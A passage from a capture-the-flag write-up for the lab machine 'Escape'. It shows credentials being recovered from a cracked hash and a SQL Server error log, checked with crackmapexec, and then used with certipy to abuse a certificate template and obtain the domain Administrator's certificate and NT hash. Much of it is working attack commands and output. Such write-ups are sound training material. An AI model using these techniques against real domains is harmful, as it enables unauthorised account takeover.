SQL_SVC::sequel:556a5a7d477831c5:33b75b11e4f760ceeb28f23b2cf29a81:010100000000000000f059621ad9db0198f3616672caebdb0000000002000800310052003900320001001e00570049004e002d004200540046004500440058003700490044004300340004003400570049004e002d00420054004600450044005800370049004400430034002e0031005200390032002e004c004f00430041004c000300140031005200390032002e004c004f00430041004c000500140031005200390032002e004c004f00430041004c000700080000f059621ad9db0106000400020000000800300030000000000000000000000000300000182b65b5a88747c57166d8036e24afd50499f40fec449e70b88a984a4f67d7980a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0038000000000000000000:REGGIE1234ronnie
|
Good, we got another set of credentials.
1
2
3
4
5
6
7
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'sql_svc' -p 'REGGIE1234ronnie'
SMB 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP 10.10.11.202 5985 DC [*] http://10.10.11.202:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.202 5985 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)
|
Good! We can log in to the target machine now!
Post Exploitation
SQLServer ErrorLog Backup
1
2
3
4
5
6
| *Evil-WinRM* PS C:\SQLServer\Logs> download ERRORLOG.BAK
Info: Downloading C:\SQLServer\Logs\ERRORLOG.BAK to ERRORLOG.BAK
Info: Download successful!
*Evil-WinRM* PS C:\SQLServer\Logs>
|
1
2
3
4
5
6
7
8
9
| 2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:43:07.76 spid51 Using 'xpstar.dll' version '2019.150.2000' to execute extended stored procedure 'xp_sqlagent_is_starting'. This is an informational message only; no user action is required.
2022-11-18 13:43:08.24 spid51 Changed database context to 'master'.
2022-11-18 13:43:08.24 spid51 Changed language setting to us_english.
|
It seems like Ryan accidentally used his password as the username to log in, and it was cached inside the error log. We can try to verify this:
1
2
3
4
5
6
7
8
9
10
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3' 2>/dev/null
SMB 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP 10.10.11.202 5985 DC [*] http://10.10.11.202:5985/wsman
WINRM 10.10.11.202 5985 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)
|
1
2
3
4
5
6
7
8
9
10
11
12
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ certipy-ad req -u 'Ryan.Cooper' -p 'NuclearMosquito3' -dc-ip '10.10.11.202' -template 'UserAuthentication' -target 'dc.sequel.htb' -upn 'Administrator@sequel.htb' -ca 'sequel-DC-CA'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
"(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'Administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
|
1
2
3
4
5
6
7
8
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.202'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
|
Error again. It should work at this point; we’ll just skip this.
1
2
3
4
5
6
7
8
9
| oxdf@hacky$ certipy auth -pfx administrator.pfx
Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
|
